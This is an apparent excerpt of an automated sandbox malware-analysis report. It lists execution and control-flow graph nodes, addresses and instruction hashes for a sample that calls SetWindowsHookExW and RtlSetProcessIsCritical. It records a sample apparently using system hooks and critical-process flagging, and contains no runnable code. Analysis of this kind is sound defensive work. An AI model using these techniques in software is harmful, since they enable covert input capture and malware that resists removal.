                                                                                    execution_graph 4664 7ff848f240f9 4665 7ff848f24101 4664->4665 4670 7ff848f242ba 4665->4670 4672 7ff848f21ca8 4665->4672 4667 7ff848f21ca8 SetWindowsHookExW 4671 7ff848f24204 4667->4671 4668 7ff848f21ca8 SetWindowsHookExW 4668->4670 4669 7ff848f2414e 4669->4667 4671->4668 4674 7ff848f21cad 4672->4674 4673 7ff848f21ce4 4673->4669 4674->4673 4675 7ff848f22932 SetWindowsHookExW 4674->4675 4676 7ff848f22971 4675->4676 4676->4669 4697 7ff848f21bfb 4700 7ff848f21c15 4697->4700 4698 7ff848f21ce4 4699 7ff848f22932 SetWindowsHookExW 4701 7ff848f22971 4699->4701 4700->4698 4700->4699 4677 7ff848f2241d 4678 7ff848f223f8 4677->4678 4678->4677 4679 7ff848f225a2 RtlSetProcessIsCritical 4678->4679 4680 7ff848f22602 4679->4680 4681 7ff848f2269d 4682 7ff848f226af 4681->4682 4687 7ff848f21c50 4682->4687 4684 7ff848f226eb 4692 7ff848f21c60 4684->4692 4686 7ff848f226fb 4689 7ff848f21c59 4687->4689 4688 7ff848f21ce4 4688->4684 4689->4688 4690 7ff848f22932 SetWindowsHookExW 4689->4690 4691 7ff848f22971 4690->4691 4691->4684 4694 7ff848f21c69 4692->4694 4693 7ff848f21ce4 4693->4686 4694->4693 4695 7ff848f22932 SetWindowsHookExW 4694->4695 4696 7ff848f22971 4695->4696 4696->4686 4710 7ff848f223bd 4711 7ff848f223d1 4710->4711 4712 7ff848f225a2 RtlSetProcessIsCritical 4711->4712 4713 7ff848f22602 4712->4713 4702 7ff848f21cf5 4703 7ff848f21cfc SetWindowsHookExW 4702->4703 4705 7ff848f22971 4703->4705

                                                                                    Control-flow Graph

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.4529552899.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_FB_7D21.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 42127242a99272e4651123aa21664bc407c30dd81398e352e603520d28ad3815
                                                                                    • Instruction ID: 80696e5a0340099f10525ac86c52e19abe1a4a7e873597b55eb60b2586676d52
                                                                                    • Opcode Fuzzy Hash: 42127242a99272e4651123aa21664bc407c30dd81398e352e603520d28ad3815
                                                                                    • Instruction Fuzzy Hash: ACD15732D0DA998FE755FBBCA8551F97BA0FF52364F04027BC048CB093DB2964468399

                                                                                    Control-flow Graph

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.4529552899.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_FB_7D21.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 392cc3e4ddd288233b396c5092b2eb355ce019f7afd9d296871636a5a67dfc75
                                                                                    • Instruction ID: 52ad719c818a6f9fd4b7eda4622efeafd7307b8c800eee7f08d2a946e349dd24
                                                                                    • Opcode Fuzzy Hash: 392cc3e4ddd288233b396c5092b2eb355ce019f7afd9d296871636a5a67dfc75
                                                                                    • Instruction Fuzzy Hash: 6071363190CA888FD759EBA898096F9BBF0FF56310F04017ED08AC3182DF399846CB91

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.4529552899.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_FB_7D21.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalProcess
                                                                                    • String ID:
                                                                                    • API String ID: 2695349919-0
                                                                                    • Opcode ID: 6224fba3fac5cfe427266da6e8b360706324ef8463ec013cfa48a402b208afd2
                                                                                    • Instruction ID: 5757704b46b6afe414f822ece00884422a37cbe4b624d3c6dcf33541efb60976
                                                                                    • Opcode Fuzzy Hash: 6224fba3fac5cfe427266da6e8b360706324ef8463ec013cfa48a402b208afd2
                                                                                    • Instruction Fuzzy Hash: A671253190CA898FD719EBA8D8496E9BBF0FF55311F04417ED08AC3182DF39A846CB81

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 144 7ff848f227b1-7ff848f22828 148 7ff848f2282a-7ff848f2282f 144->148 149 7ff848f22832-7ff848f22864 144->149 148->149 151 7ff848f2286c-7ff848f2289f 149->151 152 7ff848f22866 149->152 154 7ff848f228aa-7ff848f2291d 151->154 155 7ff848f228a1-7ff848f228a9 151->155 152->151 159 7ff848f229a9-7ff848f229ad 154->159 160 7ff848f22923-7ff848f22928 154->160 155->154 161 7ff848f22932-7ff848f2296f SetWindowsHookExW 159->161 162 7ff848f2292f-7ff848f22930 160->162 163 7ff848f22971 161->163 164 7ff848f22977-7ff848f229a8 161->164 162->161 163->164
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.4529552899.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_FB_7D21.jbxd
                                                                                    Similarity
                                                                                    • API ID: HookWindows
                                                                                    • String ID:
                                                                                    • API String ID: 2559412058-0
                                                                                    • Opcode ID: 40fe6a51aacfb89cfd8f0ebf5cbd09bb1987faf1daee964f8e7576aded1892e5
                                                                                    • Instruction ID: ee603891463837ac407d4990bc4d2923ee67bd8efdc5caf3fdb35fd4107b4e0f
                                                                                    • Opcode Fuzzy Hash: 40fe6a51aacfb89cfd8f0ebf5cbd09bb1987faf1daee964f8e7576aded1892e5
                                                                                    • Instruction Fuzzy Hash: 1561D43190CA5C9FDB58EB68D8496F9BBE1FF55321F00422FD049C3292CB75A846CB81